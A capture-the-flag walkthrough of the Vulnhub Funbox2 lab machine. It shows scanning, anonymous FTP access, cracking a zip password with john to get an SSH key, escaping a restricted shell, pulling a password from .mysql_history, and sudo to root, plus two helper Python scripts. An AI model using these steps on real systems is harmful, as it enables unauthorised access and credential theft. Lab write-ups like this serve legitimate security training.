
Vulnhub Funbox2: Detailed Walkthrough

Date: 2022-11-08 11:57:37  Views: 46
Tags: ftp 00 rw zip Vulnhub tom target-machine Funbox2 1477

Funbox2

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.116.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor
 192.168.56.100  08:00:27:86:52:7b      1      60  PCS Systemtechnik GmbH
 192.168.56.161  08:00:27:f8:00:eb      1      60  PCS Systemtechnik GmbH

The netdiscover tool bundled with Kali Linux identifies the target host's IP address as 192.168.56.161.

NMAP scan

└─$ sudo nmap -sS -sV -sC -p- 192.168.56.161 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-07 22:14 EST
Nmap scan report for bogon (192.168.56.161)
Host is up (0.000076s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5e
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 anna.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 ariel.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 bud.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 cathrine.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 homer.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 jessica.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 john.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 marge.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 miriam.zip
| -r--r--r--   1 ftp      ftp          1477 Jul 25  2020 tom.zip
| -rw-r--r--   1 ftp      ftp           170 Jan 10  2018 welcome.msg
|_-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 zlatan.zip
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f9:46:7d:fe:0c:4d:a9:7e:2d:77:74:0f:a2:51:72:51 (RSA)
|   256 15:00:46:67:80:9b:40:12:3a:0c:66:07:db:1d:18:47 (ECDSA)
|_  256 75:ba:66:95:bb:0f:16:de:7e:7e:a1:7b:27:3b:b0:58 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/logs/
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:F8:00:EB (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.02 seconds

The NMAP scan shows that the target host has only 3 open ports: 21 (FTP), 22 (SSH) and 80 (HTTP).

Get Access

Starting with the FTP service: the target host allows anonymous login, and the directory contains zip archives:

┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ ftp 192.168.56.161        
Connected to 192.168.56.161.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.56.161]
Name (192.168.56.161:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230-Welcome, archive user [email protected] !
230-
230-The local time is: Tue Nov 08 03:15:44 2022
230-
230-This is an experimental FTP server.  If you have any unusual problems,
230-please report them via e-mail to <root@funbox2>.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||49020|)
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 anna.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 ariel.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 bud.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 cathrine.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 homer.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 jessica.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 john.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 marge.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 miriam.zip
-r--r--r--   1 ftp      ftp          1477 Jul 25  2020 tom.zip
-rw-r--r--   1 ftp      ftp           170 Jan 10  2018 welcome.msg
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 zlatan.zip
226 Transfer complete
ftp> get anna.zip
local: anna.zip remote: anna.zip
229 Entering Extended Passive Mode (|||46677|)
150 Opening BINARY mode data connection for anna.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************|  1477        2.65 MiB/s    00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.16 MiB/s)
ftp> get ariel.zip
local: ariel.zip remote: ariel.zip
229 Entering Extended Passive Mode (|||51357|)
150 Opening BINARY mode data connection for ariel.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************|  1477        2.50 MiB/s    00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.47 MiB/s)
ftp> get bud.zip
local: bud.zip remote: bud.zip
229 Entering Extended Passive Mode (|||50686|)
150 Opening BINARY mode data connection for bud.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************|  1477        2.51 MiB/s    00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (157.49 KiB/s)
ftp> get cathrine.zip
local: cathrine.zip remote: cathrine.zip
229 Entering Extended Passive Mode (|||64610|)
150 Opening BINARY mode data connection for cathrine.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************|  1477        2.95 MiB/s    00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.61 MiB/s)
ftp> get homer.zip
local: homer.zip remote: homer.zip
229 Entering Extended Passive Mode (|||54262|)
150 Opening BINARY mode data connection for homer.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************|  1477        2.65 MiB/s    00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.64 MiB/s)
ftp> get jessica.zip
local: jessica.zip remote: jessica.zip
229 Entering Extended Passive Mode (|||13991|)
150 Opening BINARY mode data connection for jessica.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************|  1477        2.23 MiB/s    00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.37 MiB/s)
ftp> get john.zip
local: john.zip remote: john.zip
229 Entering Extended Passive Mode (|||43465|)
150 Opening BINARY mode data connection for john.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************|  1477        2.70 MiB/s    00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.77 MiB/s)
ftp> get marge.zip
local: marge.zip remote: marge.zip
229 Entering Extended Passive Mode (|||22454|)
150 Opening BINARY mode data connection for marge.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************|  1477        2.78 MiB/s    00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.50 MiB/s)
ftp> get miriam.zip
local: miriam.zip remote: miriam.zip
229 Entering Extended Passive Mode (|||15812|)
150 Opening BINARY mode data connection for miriam.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************|  1477        3.00 MiB/s    00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.90 MiB/s)
ftp> get tom.zip
local: tom.zip remote: tom.zip
229 Entering Extended Passive Mode (|||46681|)
150 Opening BINARY mode data connection for tom.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************|  1477        1.93 MiB/s    00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.05 MiB/s)
ftp> get welcome.msg
local: welcome.msg remote: welcome.msg
229 Entering Extended Passive Mode (|||36931|)
150 Opening BINARY mode data connection for welcome.msg (170 bytes)
100% |***********************************************************************************************************************************************************************************************|   170        9.00 MiB/s    00:00 ETA
226 Transfer complete
170 bytes received in 00:00 (790.54 KiB/s)
ftp> get zlatan.zip
local: zlatan.zip remote: zlatan.zip
229 Entering Extended Passive Mode (|||30105|)
150 Opening BINARY mode data connection for zlatan.zip (1477 bytes)
100% |***********************************************************************************************************************************************************************************************|  1477        2.72 MiB/s    00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.13 MiB/s)
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ ls
anna.zip  ariel.zip  bud.zip  cathrine.zip  homer.zip  jessica.zip  john.zip  marge.zip  miriam.zip  nmap_full_scan  tom.zip  welcome.msg  zlatan.zip
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ cat welcome.msg   
Welcome, archive user %U@%R !

The local time is: %T

This is an experimental FTP server.  If you have any unusual problems,
please report them via e-mail to <root@%L>.


Download all of these zip archives to the local Kali Linux machine.

┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ unzip anna.zip 
Archive:  anna.zip
[anna.zip] id_rsa password:

! anna_hash : No such file or directory
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ zip2john anna.zip > anna_hash
ver 2.0 efh 5455 efh 7875 anna.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt anna_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2022-11-07 22:19) 0g/s 8853Kp/s 8853Kc/s 8853KC/s !LUVDKR!..*7¡Vamos!
Session completed. 

Judging by the pattern of the file names, these are likely a series of usernames, and each archive probably contains an SSH private key file. This one cannot be cracked, which may well be a trap. Note, however, that the permissions on the zip files are not all the same: only tom.zip lacks write permission.
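The observation above (same size everywhere, one odd mode string) can be made mechanical. As an added example that is not part of the original post, the Python script below parses the anonymous-FTP listing that nmap returned and reports any .zip whose mode differs from the rest; the listing is embedded as sample input so it runs offline.

```python
import re
from collections import Counter

# Sample input: the anonymous-FTP listing reported by nmap's ftp-anon script
# on this page, copied here so the script runs without a network.
LISTING = """\
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 anna.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 ariel.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 bud.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 cathrine.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 homer.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 jessica.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 john.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 marge.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 miriam.zip
-r--r--r--   1 ftp      ftp          1477 Jul 25  2020 tom.zip
-rw-r--r--   1 ftp      ftp           170 Jan 10  2018 welcome.msg
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 zlatan.zip
"""

# One unix-style "ls -l" line: mode, link count, owner, group, size,
# month, day, year-or-time, file name.
LINE_RE = re.compile(
    r"^(?P<mode>[-dl][rwxsStT-]{9})\s+\d+\s+\S+\s+\S+\s+(?P<size>\d+)"
    r"\s+\S+\s+\d+\s+\S+\s+(?P<name>.+)$"
)


def parse_listing(text):
    """Turn the raw listing into a list of {'mode', 'size', 'name'} dicts."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entries.append({"mode": m["mode"], "size": int(m["size"]), "name": m["name"]})
    return entries


def find_mode_outliers(entries, suffix=".zip"):
    """Among files with the given suffix, return the names whose mode string
    differs from the most common one. Equal sizes plus a single odd mode is
    exactly the hint the walkthrough spots: tom.zip is the only archive
    without the owner/group write bit."""
    group = [e for e in entries if e["name"].endswith(suffix)]
    if not group:
        return []
    common_mode, _ = Counter(e["mode"] for e in group).most_common(1)[0]
    return sorted(e["name"] for e in group if e["mode"] != common_mode)


if __name__ == "__main__":
    parsed = parse_listing(LISTING)
    print("files:", len(parsed), "mode outliers:", find_mode_outliers(parsed))
```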

Try cracking that one:

┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ zip2john tom.zip > tom_hash  
ver 2.0 efh 5455 efh 7875 tom.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt tom_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iubire           (tom.zip/id_rsa)     
1g 0:00:00:00 DONE (2022-11-07 22:21) 25.00g/s 102400p/s 102400c/s 102400C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

The john cracker recovers the password almost instantly. Opening tom.zip with it yields the private key, which logs in to tom's shell over SSH:

┌──(kali㉿kali)-[~/Vulnhub/Funbox2]
└─$ ssh -i id_rsa [email protected] 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Nov  8 03:23:16 UTC 2022

  System load:  0.16              Processes:             98
  Usage of /:   65.1% of 4.37GB   Users logged in:       0
  Memory usage: 34%               IP address for enp0s3: 192.168.56.161
  Swap usage:   0%


0 packages can be updated.
0 updates are security updates.


Last login: Sat Jul 25 12:25:33 2020 from 192.168.178.143
tom@funbox2:~$ id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

tom@funbox2:~$ pwd
/home/tom
tom@funbox2:~$ cd /var/www
-rbash: cd: restricted
tom@funbox2:~$ 

This is a restricted shell (rbash), but typing bash -i gives an interactive shell.

An interactive shell can also be obtained as follows:

tom@funbox2:/var/www/html$ cd /home
tom@funbox2:/home$ ls
tom
tom@funbox2:/home$ cd tome
bash: cd: tome: No such file or directory
tom@funbox2:/home$ cd tom
tom@funbox2:~$ ls
tom@funbox2:~$ ls -alh
total 40K
drwxr-xr-x 5 tom  tom  4.0K Jul 25  2020 .
drwxr-xr-x 3 root root 4.0K Jul 25  2020 ..
-rw------- 1 tom  tom     6 Jul 25  2020 .bash_history
-rw-r--r-- 1 tom  tom   220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 tom  tom  3.7K Apr  4  2018 .bashrc
drwx------ 2 tom  tom  4.0K Jul 25  2020 .cache
drwx------ 3 tom  tom  4.0K Jul 25  2020 .gnupg
-rw------- 1 tom  tom   295 Jul 25  2020 .mysql_history
-rw-r--r-- 1 tom  tom   807 Apr  4  2018 .profile
drwx------ 2 tom  tom  4.0K Jul 25  2020 .ssh
-rw-r--r-- 1 tom  tom     0 Jul 25  2020 .sudo_as_admin_successful
-rw------- 1 tom  tom     0 Jul 25  2020 .viminfo
tom@funbox2:~$ cat .mysql_history 
_HiStOrY_V2_
show\040databases;
quit
create\040database\040'support';
create\040database\040support;
use\040support
create\040table\040users;
show\040tables
;
select\040*\040from\040support
;
show\040tables;
select\040*\040from\040support;
insert\040into\040support\040(tom,\040xx11yy22!);
quit
tom@funbox2:~$ 

This looks like a username and password: tom xx11yy22! (\040 is the encoded form of a space character.)
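Anything typed at a mysql prompt is written to ~/.mysql_history in this escaped libedit format, which is why credentials so often survive there. As an added example that is not part of the original post, the Python script below decodes the \040-style escapes and flags statements that usually embed a secret, the kind of check an auditor would run over home directories; the sample history is constructed from the lines above.

```python
import re

# Constructed sample in the libedit _HiStOrY_V2_ format used by the mysql
# client, mirroring the .mysql_history shown on the page: whitespace is
# stored as a three-digit octal escape (\040 is a space) and a literal
# backslash is stored as "\\". A raw string keeps the backslashes intact.
SAMPLE_HISTORY = r"""_HiStOrY_V2_
show\040databases;
create\040database\040support;
use\040support
create\040table\040users;
insert\040into\040support\040(tom,\040xx11yy22!);
quit
"""

# Either an escaped backslash or an octal byte escape.
ESCAPE_RE = re.compile(r"\\(\\|[0-7]{3})")

# Statement shapes that usually carry a secret when typed interactively.
SENSITIVE_RE = re.compile(
    r"\b(identified\s+by|password|insert\s+into)\b", re.IGNORECASE
)


def decode_history(text):
    """Return the decoded statements, dropping the _HiStOrY_V2_ header."""
    lines = text.splitlines()
    if lines and lines[0] == "_HiStOrY_V2_":
        lines = lines[1:]

    def unescape(m):
        token = m.group(1)
        return "\\" if token == "\\" else chr(int(token, 8))

    return [ESCAPE_RE.sub(unescape, line) for line in lines]


def find_sensitive(statements):
    """Statements worth a manual review because they likely embed credentials."""
    return [s for s in statements if SENSITIVE_RE.search(s)]


if __name__ == "__main__":
    for stmt in find_sensitive(decode_history(SAMPLE_HISTORY)):
        print("possible credential in history:", stmt)
```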

The rest is straightforward:

tom@funbox2:~$ sudo -l
[sudo] password for tom: 
Matching Defaults entries for tom on funbox2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tom may run the following commands on funbox2:
    (ALL : ALL) ALL
tom@funbox2:~$ sudo su
root@funbox2:/home/tom# id 
uid=0(root) gid=0(root) groups=0(root)
root@funbox2:/home/tom# cd /root
root@funbox2:~# ls
flag.txt
root@funbox2:~# cat flag.txt
   ____  __  __   _  __   ___   ____    _  __             ___ 
  / __/ / / / /  / |/ /  / _ ) / __ \  | |/_/            |_  |
 / _/  / /_/ /  /    /  / _  |/ /_/ / _>  <             / __/ 
/_/    \____/  /_/|_/  /____/ \____/ /_/|_|       __   /____/ 
           ____ ___  ___  / /_ ___  ___/ /       / /          
 _  _  _  / __// _ \/ _ \/ __// -_)/ _  /       /_/           
(_)(_)(_)/_/   \___/\___/\__/ \__/ \_,_/       (_)            
                                                              
from @0815R2d2 with ♥
root@funbox2:~# 

Root flag obtained!!!

From: https://www.cnblogs.com/jason-huawen/p/16869179.html
